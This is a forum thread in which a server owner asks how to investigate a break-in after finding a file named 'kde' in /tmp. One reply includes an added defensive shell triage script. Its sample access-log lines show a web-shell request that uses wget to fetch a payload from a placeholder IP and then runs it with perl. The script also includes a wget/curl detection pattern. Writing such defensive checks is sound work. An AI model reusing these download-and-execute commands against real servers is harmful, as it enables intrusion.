  1. #1
    Member (Join Date: Mar 2004, Posts: 193)

    Hacked - help please

    Yesterday night I received a message that my server was down for about one hour. Because we have had several attacks before we have secured our server. However the security seems to be not 100% secure. We have installed a firewall (APF) that has ddos protection and filters some ip addresses using dshield. I also secured the /tmp folder using scripts/securetmp. However I found a file in the /tmp folder called KDE.

    (1) is there a way to check if this script was run in /tmp?
    (2) is there a way to see what happened before the server went down?
    (3) are there any logs about who gained access to /tmp?
    (4) is there a way to find out who uploaded that file?
    (5) is there a way to search in the .php files in /home/ for uploaders who may have uploaded the file?
    (6) is there a way to check if someone can execute files as nobody in the /tmp folder? (does anyone have a simple program to check this?)

    Below I will post the file that was uploaded and the traffic stats of my server.

    Many thanks in advance for helping me!!

  2. #2
    Member (Join Date: Mar 2004, Posts: 193)

    And here are the traffic stats.

  3. #3
    Member (Join Date: Mar 2004, Posts: 193)

    I just found this in WHM:

    nobody 0.03 0.08 0.0
    Top Process %CPU 2.0 proftpd: connected: localhost (127.0.0.1:38243)
    It doesn't say anything to me, but maybe someone knows what this does?

  4. #4
    Member (Join Date: Jul 2002, Location: Canada, Posts: 675)

    The first thing you need to ensure is that you weren't compromised and that the hacker still doesn't have access.

    Check all running processes, run chkrootkit and do a port scan on your server.

    netstat -an
    ps -aux

    Then go through and start looking at your log files and find which user account the file came through from.
    You might want to look for something such as wget or even the filename itself.

    If you're not feeling good about this then hire someone else to take a look as well. A second opinion and eyes can never hurt.
    Upload Guardian 2.0 - Sign up for our early beta
    ServerProgress - Server security, consulting and assistance
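    The checks suggested above (list listening sockets, look for wget or the file name in the logs, and the poster's question 6 about whether files in /tmp can be executed) as one small POSIX shell helper. This is an added example, not code from the thread or from cPanel; it assumes a Linux host with /proc/mounts, "netstat -an"-style output and Apache-style access logs, and all sample data in it is constructed (the file is named "kde" as in the thread, the IPs are documentation addresses, and the expected-port list is an assumption for this host). In netstat output, 0.0.0.0 in the local column means the socket is bound on every interface; it is not a remote user.

```shell
#!/bin/sh
# Added triage helper (not from the thread). Assumes Linux, net-tools netstat
# output and Apache-style access logs. All sample data is constructed.

# Constructed "netstat -an" excerpt.
NETSTAT_SAMPLE='Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:2086            0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:2087            0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:6667            0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:21            127.0.0.1:38243         ESTABLISHED
udp        0      0 0.0.0.0:53              0.0.0.0:*'

# Constructed access-log lines; the dropped file is called "kde" as in the thread.
ACCESS_LOG_SAMPLE='198.51.100.7 - - [20/Jun/2004:02:11:05 +0200] "GET /gallery/upload.php?cmd=wget%20http://198.51.100.7/kde%20-O%20/tmp/kde HTTP/1.1" 200 77
192.0.2.5 - - [20/Jun/2004:02:12:00 +0200] "GET /about.html HTTP/1.1" 200 1040
198.51.100.7 - - [20/Jun/2004:02:12:30 +0200] "GET /gallery/upload.php?cmd=perl%20/tmp/kde HTTP/1.1" 200 12'

# Ports expected to listen on this host (assumption: web, WHM and DNS only).
EXPECTED_PORTS='80 443 2086 2087 53'

# all_interface_listeners: print "proto port" for every socket bound to 0.0.0.0,
# i.e. reachable on every interface (TCP in LISTEN state, or any UDP bind).
all_interface_listeners() {
    printf '%s\n' "$NETSTAT_SAMPLE" | awk '
        $4 ~ /^0\.0\.0\.0:/ && ($6 == "LISTEN" || $1 == "udp") {
            n = split($4, a, ":"); print $1, a[n]
        }'
}

# unexpected_listeners: the subset of the above whose port is not on the expected
# list. Anything here deserves a look with ps/lsof before assuming it is benign.
unexpected_listeners() {
    all_interface_listeners | while read -r proto port; do
        case " $EXPECTED_PORTS " in
            *" $port "*) ;;                            # known service, skip
            *) printf '%s %s\n' "$proto" "$port" ;;
        esac
    done
}

# fetch_attempts NAME: access-log lines mentioning a download tool or the dropped
# file name; they point at the script that was abused and the client IP behind it.
fetch_attempts() {
    printf '%s\n' "$ACCESS_LOG_SAMPLE" | grep -iE "wget|curl|$1"
}

# mount_is_noexec DIR [MOUNTS_FILE]: succeed if DIR is its own mount point and
# carries the noexec option; a secured /tmp should show noexec and nosuid.
mount_is_noexec() {
    dir=$1; mounts=${2:-/proc/mounts}
    awk -v d="$dir" '
        $2 == d { n = split($4, o, ","); for (i = 1; i <= n; i++) if (o[i] == "noexec") found = 1 }
        END { exit found ? 0 : 1 }' "$mounts"
}

# executables_in DIR: regular files under DIR with any execute bit set.
executables_in() {
    find "$1" -type f \( -perm -u=x -o -perm -g=x -o -perm -o=x \) -print
}

# triage NAME: run all checks for a dropped file called NAME (e.g. "kde").
triage() {
    echo "== sockets bound on all interfaces, not in the expected list =="; unexpected_listeners
    echo "== log lines mentioning wget/curl or $1 ==";                   fetch_attempts "$1"
    echo "== executable files in /tmp ==";                              executables_in /tmp
    if mount_is_noexec /tmp; then echo "/tmp is mounted noexec"; else echo "/tmp is NOT noexec"; fi
}
```

    Run it with `triage kde`; to use it on a real host, replace the two constructed samples with `netstat -an` output and the real access logs under /usr/local/apache/domlogs. The unexpected-listener check only tells you which port to investigate next; the process behind it (lsof -i :PORT) and the log hits are what answer the thread's questions 1 and 4.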

  5. #5
    Member (Join Date: Mar 2004, Posts: 193)

    First, thanks a lot, ramprage!

    I already ran chkrootkit and it didn't find anything except bindshell (but that is normal if you have cPanel installed).

    I removed the kde file from /tmp so the person cannot start it again.

    Would you mind answering the 6 questions above so I can find out some more information?

    Here are some things I have some doubts about:

    tcp 0 0 0.0.0.0:2084 0.0.0.0:* LISTEN
    tcp 0 0 0.0.0.0:2086 0.0.0.0:* LISTEN
    tcp 0 0 0.0.0.0:2087 0.0.0.0:* LISTEN

    There are several connections from the IP 0.0.0.0 on several ports, what do they mean?

    The other messages seem to be ok, since they are all TCP on port 80.

    Also there is some strange traffic on UDP on port 53. 0.0.0.0 is connected to several ip addresses of the server which we actually don't use. Could you tell me who the user 0.0.0.0 is?
    On that other command everything also looks good, except I am not sure if this is ok:

    USERNAME-OF-A-CLIENT 1673 0.0 0.1 8528 752 ? S Jun20 0:00 cpaneld - serving 217.120.4
    I really appreciate your help, and I have also often used your great web site.

  6. #6
    Member (Join Date: Mar 2004, Posts: 193)

    Kick

  7. #7
    Member netwrkr (Join Date: Apr 2003, Posts: 203)

    Originally posted by Tagor: Kick
    Any chance of you researching your questions rather than have someone spoon feed you the answers?
    Give a man a fish and he will eat for a day; teach a man to fish and he will have food for life.
